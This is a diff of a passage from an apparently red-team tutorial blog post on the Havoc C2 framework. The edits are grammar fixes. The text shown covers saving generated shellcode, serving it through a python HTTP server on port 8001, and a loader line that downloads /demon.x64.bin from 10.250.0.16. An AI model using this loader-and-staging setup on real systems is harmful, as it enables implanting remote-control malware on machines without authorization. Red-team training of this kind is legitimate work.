yl-labs/yl-labs.github.io/_posts/2025-03-18-red-reaming-havoc-c2.md

 ![](/assets/imgs/havoc-c2/Pasted image 20240218210043.png)

 When the generation of the shellcode is completed, a pop-up will appear prompting us to save the shellcode to a location of our choice.
-Upon doing so, we should see the success message indicating to us that everything went well.
+Upon doing so, we should see the success message indicating that everything went well.

 ![](/assets/imgs/havoc-c2/Pasted image 20240218210324.png)

 ### Getting it all together

-With our shellcode now in place,  we need to navigate to the directory we saved it in and start a python http listener that will be responsible of serving the shellcode's content.
+With our shellcode now in place, we need to navigate to the directory we saved it in and start a python http listener that will be responsible for serving the shellcode's content.

 ```
 ➜  SquidGuard python3 -m http.server 8001
 Serving HTTP on 0.0.0.0 port 8001 (http://0.0.0.0:8001/) ...
 ```

-In this case, port `8001` was used as an example.
+In this case, port `8001` is being used.

 Now, it's time to update our loader with the appropriate values.
-The modifications only go as far as modifying the following line :
+The modifications only go as far as modifying the following line:

 ```
 recvbuf = Download(L"10.250.0.16\0", std::stoi("8001"), L"/demon.x64.bin\0");